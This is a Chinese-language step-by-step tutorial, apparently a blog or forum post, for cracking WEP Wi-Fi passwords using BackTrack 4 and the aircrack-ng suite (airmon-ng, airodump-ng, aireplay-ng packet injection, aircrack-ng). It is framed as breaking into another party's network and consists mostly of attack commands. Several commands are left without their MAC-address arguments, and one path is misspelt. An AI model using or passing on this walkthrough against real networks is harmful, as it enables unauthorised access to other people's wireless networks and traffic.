一、下载BT4系统

　　BackTrack4系统(BT4)它是一个集合了很多破解工具的Linux 系统，现在最新版是R2大约2G，终极版大约1.5G，如果你下载是硬盘安装版的文件可以用软件unetbootin将它安装到U盘，用U盘启动BT4。(本人用U盘启动的)。为了方便读者，这里提供下载URL：http://www.backtrack-linux.org/downloads/

　　二、命令破解：

　　1、查看本机的物理地址(my')

　　ifconfig -a

　　注：wlan0是无线网卡，记下my'mac ->c4:17:fe:5b:23:ec(这个是我本人的，你不要连这个都抄咯!)

　　2、启动一个查看无线信息窗口

　　/ect/init.d/wicd start

　　注：启动后单击系统桌面左下角->internet->wicd netword manager,就可以直观的查看你当前接受到的无线，其实这步不做也可以，不会影响整个过程。

　　3、激活网卡

　　airmon-ng start wlan0

　　注：经过这步后，你的无线网卡名就会变成：mon0(这个0是零，别傻Q傻Q的!)

　　4、测试网络信号详细信息

　　airodump-ng mon0

　　注：显示出来的界面，排在最上面的表示信号最好(也就是data最大)，ENC和CIPHER AUTH表示加密方式，找到WEP的加密方式，记下它的名字(最右边)和无线物理地址(ap'mac最左边)，还有CH频道号。

　　5、截取数据包

　　airodump-ng -c CH --bssid -w aphack mon0

　　注：CH(频道号)和对应第④，aphack是截取后的包名，要与第⑧对应。

　　6、获取大量ivs数据包

　　aireplay-ng -1 0 -a -h mon0

　　7、抓包

　　aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b -h mon0

　　注：注意大小写!

　　8、截取密码

　　aircrack-ng aphack*.cap

　　注：aphack*.cap的名要与第⑤相应。

　　9、至于能不能破解成功还要加点人品，哈哈!至少截取5000个数据包以上才能破解出，如果对方在下载的话，你可能破解速度也更快，因为他下载就会有更的数据丢失而被你幸运的捡到!哈哈!祝你成功!